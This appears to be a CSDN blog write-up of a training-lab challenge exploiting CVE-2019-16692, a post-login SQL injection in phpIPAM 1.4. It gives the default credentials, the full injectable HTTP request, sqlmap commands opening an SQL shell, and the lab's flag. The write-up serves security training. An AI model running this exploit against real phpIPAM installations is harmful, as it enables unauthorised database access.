春秋云镜 CVE-2019-16692

最新推荐文章于 2024-07-17 14:09:43 发布
最新推荐文章于 2024-07-17 14:09:43 发布
阅读量396 收藏 1
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_22002773/article/details/132343640
版权
文章描述了phpIPAM1.4版本的后台存在SQL注入漏洞,攻击者可以通过提交恶意请求进行登录并获取flag。漏洞利用过程详细展示了利用方法和获取的flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

春秋云镜 CVE-2019-16692 phpIPAM 1.4 - SQL Injection

靶标介绍

phpIPAM 1.4后台存在SQL Injection。

启动场景

在这里插入图片描述

漏洞利用

后台SQL注入,admin/admin888登陆成功。
exp

POST /app/admin/routing/edit-bgp-mapping-search.php HTTP/1.1
Host: xxx.com
Content-Length: 190
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.com
Referer: http://xxx.com/index.php?page=administration&section=sections
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.2.617032228.1689668529; _ga_J1DQF09WZC=GS1.2.1689668531.1.0.1689668531.0.0.0; phpipam=lv3pkc2n1qmo98cb33cj8jc4h6; table-page-size=50; search_parameters={"addresses":"on","subnets":"on","vlans":"on","vrf":"off","pstn":"off","circuits":"on","customers":"off"}
Connection: close

subnet=1&bgp_id=1

请求包保存为1.txt
python3 sqlmap.py -r 1.txt --batch
在这里插入图片描述
python3 sqlmap.py -r 1.txt --sql-shell
select flag from flag;
在这里插入图片描述
得到flag

flag{ad54ad07-edf1-4740-98d5-9ce58f95ad14}

rconfig-cve_2019_16662
m0_49025459的博客
12-14 512
直接访问IP:login.php查看特征。
IP地址管理系统phpipam部署
m0_37680131的博客
11-01 9893
phpipam是一个开源Web IP地址管理应用程序(IPAM)。其目标是提供轻便,现代且有用的IP地址管理。它是基于PHP的应用程序,具有MySQL数据库后端,使用jQuery库,ajax和HTML5 / CSS3功能。官网参考地址:https://phpipam.net/news/phpipam-installation-on-centos-7/
phpipam1.4BUS
mingxiawdv11的博客
07-08 371
phpIPAM installation on CentOS 7 Here is a full guide on how to install phpIPAM on CentOS 7. This should work on all RHEL based distributuons. For this guide I used competely fresh install of CentOS 7, we will do step by step guide for all applications nee
centos7安装phpipam1.4
夏虫不可语冰
08-10 1176
本文主要带大家安装phpIPAM,phpIPAM是用来管理IP地址和子网的工具。
Ubuntu 24.04 Server部署Zabbix7.0 和 PHPIPAM(完成)
songhe107的专栏
07-11 1531
使用Zabbix对网络中主要设备进行监控.PHPIPAM对网络中拓扑就IP进行规划管理.
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1737
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
春秋CVE-2024-0195【记录】
zhiquovo的博客
03-07 1358
春秋CVE-2024-0195【记录】 漏洞描述 SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行
春秋CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2692
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 762
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Centos7搭建phpipam管理系统
是何妨呀~
11-15 2075
phpIPAM是一个开源的项目,使用它可以免费的进行ip地址的管理,能够更加有效的规划和管理ip地址。下载地址:上述介绍可以参考查看,安装请看下面操作。
php sql injection,PHP防止SQL Injection
weixin_35300493的博客
03-13 166
防止SQLInjection>>安全配置php和apache的配置,主要用到php.ini和httpd.conf,而此文我们主要用到的是php.ini的配置。1.为了安全起见我们一般都打开php.ini里的安全模式,即让safe_mode = On。2.还有一个就是返回php执行错误的display_errors这会返回很多有用的信息,所以我们应该关闭之,即让display_error...
还不抛弃效率低下的传统手动管理方式,赶快使用轻便型 IP 地址管理系统 phpipam 吧!
网管小贾的博客
07-17 1096
还不抛弃效率低下的传统手动管理方式,赶快使用轻便型 IP 地址管理系统 phpipam 吧!
php ip地址管理系统,phpIPAM – 免费开源的IP地址管理工具,重量级
weixin_31290873的博客
03-17 1万+
phpIPAM - 开源IP地址管理通常,网络或系统管理员会使用一个电子表格来记录IP地址的分配信息。此方法对于只有一个管理员,并且网络很小的情况下比较奏效。然而,对于多个大型网络而言,依赖于电子表格并不方便,十分容易出错,引起严重的一种系统地管理IP地址分配的方式是使用网络化的IP地址管理工具。不仅仅是因为网络化管理工具能在任何地方访问并管理,而且其后端数据库也能保证所有更新能正确同步并实时生...
CVE-2019-11477漏洞详解详玩(删)
TCP/IP
06-28 6396
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
Zeroshell 操作系统命令注入漏洞复现(CVE-2019-12725)
千寻的博客
05-22 3189
介绍 Zeroshell 是一个微型的linux发行版本,它功能强大,具有强大的router、radius、web门户、防火墙、virtual**、Qos、 DHCP、dns转发等功能, 可以用来安装到服务器上为内网提供网络服务, 而且安装和使用都很方便,有U盘,Live CD和Flash imgage文件用于安装, 可以使用web界面进行设置和管理。想自己部署软路由,又不想编译,找驱动程序,或者别人编译的固件有后门, 可以考虑用Zeroshell替代Openwrt/LEDE。 总的来说Zeroshell
centos7安装phpipam进行ip地址管理
weixin_34306676的博客
05-28 2526
phpIPAM是一个开源的IPAM(IP地址管理)项目,使用它可以免费的进行ip地址的管理,使得管理人员能够更加有效的规划和管理ip地址官方网站https://phpipam.net/ 项目github地址https://github.com/phpipam/phpipam 一、安装依赖包前期需要安装相关依赖包,同时关闭防火墙等sed-i'/SELINUX/s/e...
IPAM 随笔
liushen0916的专栏
08-22 7579
需求和 IPAM 纵览随着企业内部业务的增长,硬件资源和IP地址等资源也急速增长,我们这时候就需要能够有效的规划和使用IP资源,最好有合适的方法去规划、管理和运营。我期待的 IPAM 能够满足以下条件: 轻量级的,容易上手; 开源的,成本低; 能够自动发现; 具有使用情况报告; 通知机制; 方便的权限管理; API, 方便集成 经过查找和询问朋友,有以下平台可以直接或者间接的满足以上需求:1)sol
免费开源网管软件cacti,nagios,zabbix,WeADMIN ITOSS亲测分享
热门推荐
Enweitech Software Works
04-27 1万+
免费开源网管软件cacti,nagios,zabbix,WeADMIN ITOSS亲测分享 随着行业的发展,业务系统越来越庞大,涉及的软硬件维护点越来越多,特别是数据中心内部,运维的复杂度和难度也越来越大,与此同时,随着去IOE的潮流和后IOE时代的架构特色,PC服务器、虚拟机和开源数据库等软硬件产品的比重上升,运维的内容和节点数量都有比较明显的变化。 俗话讲工欲善其事必先利其器,
春秋CVE-2023-33440
最新发布
01-12
### 关于春秋CVE-2023-33440 漏洞详情 对于CVE-2023-33440,在当前提供的参考资料中并未直接提及此特定编号的漏洞细节。然而,基于以往处理类似安全事件的经验以及Apache Struts项目的安全公告模式[^1],可以推测这类CVE通常涉及Web应用程序框架中存在的某种形式的安全缺陷。 针对未具体说明的CVE编号,建议采取以下通用措施来应对潜在风险: #### 一、漏洞影响范围 此类漏洞可能会影响使用了受影响版本组件的应用程序,特别是那些依赖于特定功能实现的部分。例如,在之前的案例中提到的不同类型的Struts2漏洞均涉及到不同场景下的远程代码执行可能性或文件操作不当等问题[^2][^3][^4]。 #### 二、修复方案概述 为了有效缓解并最终解决由CVE-2023-33440引起的风险,应当遵循官方发布的最新指南进行更新或打补丁。一般情况下,这包括但不限于以下几个方面: - **及时升级软件**:确保所使用的Apache Struts库是最新的稳定版。 - **审查现有配置**:检查应用服务器上的所有设置是否符合最佳实践标准,尤其是与安全性有关的部分。 - **强化输入验证机制**:加强对用户提交数据的有效性和合法性校验,防止恶意构造的数据触发漏洞。 - **监控异常行为**:部署日志审计工具和服务端防护产品,以便快速发现任何可疑活动。 由于缺乏具体的漏洞描述和技术分析文档作为依据,上述内容仅能作为一个大致方向指导。强烈推荐查阅来自权威渠道的第一手资料获取最准确的信息。 ```bash # 假设存在一个命令用于查询最新的安全通告 curl https://struts.apache.org/security.html | grep "CVE-2023-33440" ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值